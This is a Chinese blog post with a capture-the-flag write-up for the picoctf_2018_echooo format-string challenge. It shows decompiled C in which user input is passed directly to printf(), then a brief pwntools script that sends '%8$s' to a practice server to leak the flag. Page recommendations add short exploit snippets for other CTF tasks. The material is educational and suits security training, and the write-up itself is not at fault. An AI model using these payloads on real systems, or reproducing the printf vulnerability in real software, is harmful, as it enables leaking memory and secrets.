picoctf_2018_echooo

最新推荐文章于 2024-09-10 19:45:10 发布
最新推荐文章于 2024-09-10 19:45:10 发布
阅读量53 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132717051
版权

picoctf_2018_echooo

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8047000)

32位,只开了nx

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  __gid_t v3; // [esp+14h] [ebp-94h]
  FILE *stream; // [esp+18h] [ebp-90h]
  char s[64]; // [esp+1Ch] [ebp-8Ch] BYREF
  char v6[64]; // [esp+5Ch] [ebp-4Ch] BYREF
  unsigned int v7; // [esp+9Ch] [ebp-Ch]

  v7 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  v3 = getegid();
  setresgid(v3, v3, v3);
  memset(s, 0, sizeof(s));
  memset(s, 0, sizeof(s));
  puts("Time to learn about Format Strings!");
  puts("We will evaluate any format string you give us with printf().");
  puts("See if you can get the flag!");
  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts(
      "Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
    exit(0);
  }
  fgets(v6, 64, stream);
  while ( 1 )
  {
    printf("> ");
    fgets(s, 64, stdin);
    printf(s);
  }
}

把flag读在了栈上

并且给出了格式化字符串漏洞

本地调试,写一个flag.txt文件
在这里插入图片描述

from pwn import*
from Yapack import *
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26727,"./pwn",10)

#debug("b *0x804874f")
sla(b'> ',b"%8$s")

ia()

在这里插入图片描述

YameMres
关注
专栏目录
C语言 关于n*n乘法口诀表(99乘法口诀等都可以实现)
weixin_47648626的博客
11-17 6331
C语言 关于DIY乘法口诀表一.理清概念1.基础概念二.思路方法1.简单思路2.具体思路3.核心算法三.实际操作1.程序实现2.运行结果四.总结 一.理清概念 1.基础概念 首先:九九乘法口诀表 1、九九表一般只用一到九这9个数字。 2、九九表包含乘法的可交换性 3、朗读时有节奏,便于记忆全表。   而自定义乘法口诀表(DIY口诀表)可以实现: n*n乘法口诀表 更加灵活而且有趣,下面带大家来详细学习 二.思路方法 1.简单思路 实现一个函数打印乘法口诀表,口诀表的行数和列数自己指定. (输入
bpftrace:这个超好用的 Linux 性能工具,你还不知道?
osfront的博客
01-14 699
bpftrace:这个超好用的 Linux 性能工具,你还不知道? 简介 bpftrace 是 Linux 高级追踪工具和语言。该工具基于 eBPF 和 BBC 实现了通过探针机制采集内核和程序运行的信息,然后用图表等方式将信息展示出来,帮助开发者找到隐藏较深的 Bug、安全问题和性能瓶颈。 bpftrace 使用 LLVM 作为后端,将脚本编译为 BPF 字节码,并利用 BCC 与 Linux BPF 系统交互,以及现有的 Linux 跟踪功能:内核动态跟踪(kprobes)、用户级动态跟踪(uprobe
picoctf_2018_echooo(fmt)
m0_51251108的博客
11-19 346
picoctf_2018_echooo 这题还是蛮有意思的 程序分析: 它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好 要写个脚本转换下,倒着组合一下 exp: from pwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',29996) offest=11+(0x8c-0x4c)/4 print offest flag='' for i in range(11): payload='
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2873
BUUCTF picoctf_2018_echo back
BUUCTF(pwn)picoctf_2018_are you root
半岛铁盒的博客
04-11 190
strdup: malloc一个参数字符串大小的内存,并且将字符串拷贝进去. 思路 利用login, 将我们想要的数据排列好, *(v6 + 2), 其实就是v6[2], 每四个字节就是一个数据 所以字符只需要是 ’aaaaaaaa’ + p64(0x5), 注意大小应该是0x10, 这样最好,可以百分百申请回来 将其释放掉 重新申请回来这样就不是 * v6指向它了而是v6指向它了 from pwn import * p = remote('node3.buuoj.cn',27037) p...
C语言 关于判断闰年
weixin_47648626的博客
11-17 2314
关于判断闰年一. 理清概念闰年的概念二.思路方法1.简单思路2.核心算法三.实际操作A.直接编写判断语句程序实现B.使用函数方法程序实现4.总结 一. 理清概念 闰年的概念 闰年是公历中的名词, 闰年分为普通闰年和世纪闰年 普通闰年:公历年份是4的倍数的,且不是100的倍数,为普通闰年。(如2004年就是闰年); 世纪闰年:公历年份是整百数的,必须是400的倍数才是世纪闰年(如1900年不是世纪闰年,2000年是世纪闰年); 二.思路方法 1.简单思路 由概念我们可以得出闰年的判断方法: 该整数能被4
C语言 关于递归和非递归实现第N个斐波那契数
weixin_47648626的博客
11-24 506
C语言 关于DIY乘法口诀表一.理清概念概念二.思路方法1.简单思路2.核心算法三.实际操作1.程序实现2.运行结果 一.理清概念 概念 二.思路方法 1.简单思路 2.核心算法 三.实际操作 1.程序实现 2.运行结果 ...
BUUCTF pwn wp 136 - 140
fa1c4的blog
04-28 557
pwnable_asm picoctf_2018_echooo jarvisoj_level6_x64 npuctf_2020_level2 [2020 新春红包题]3
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1297
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
picoctf_2018_rop chain
、moddemod
07-06 654
exp from pwn import * context.log_level = 'debug' proc_name = './PicoCTF_2018_rop_chain' p = remote('node3.buuoj.cn', 27027) elf = ELF(proc_name) flag_addr = elf.sym['flag'] win_function1 = elf.sym['win_function1'] win_function2 = elf.sym['win_function2'
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 855
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 1011
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 585
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 799
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
新书宣传:《量子安全:信息保护新纪元》
最新发布
Chahot的博客
09-10 553
你好!这是我第一次发布类广告的博文,目的也很单纯,希望以作者的身份介绍一下自己出版的图书——《量子安全:信息保护新纪元》。此书于2024年7月出版,目前各大平台有售,是电子工业出版社&博文视点旗下图书。本书从经典信息安全框架始详细阐述了网络安全的核心概念、关键技术及其应用,并对以量子密钥分发、量子隐态传输、超密编码等为代表的量子安全技术行了深的解析,以实际案例和故事为基础,增强了内容的趣味性和实用性,最后还揭示了前沿量子安全技术的研究成果与方向。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1518
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
【绿盟科技盟管家-注册/登录安全分析报告】
09-10 1314
绿盟科技应用互联网技术启动“盟管家”服务模式。通过全方位的数据集成平台,实现信息互通、化繁为简。已注册用户可实时了解Case处理进度及情况,帮助客户智能化判断紧急漏洞、设备版本,实时提供风险预警、升级提醒等。作为老牌安全头部科技公司, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值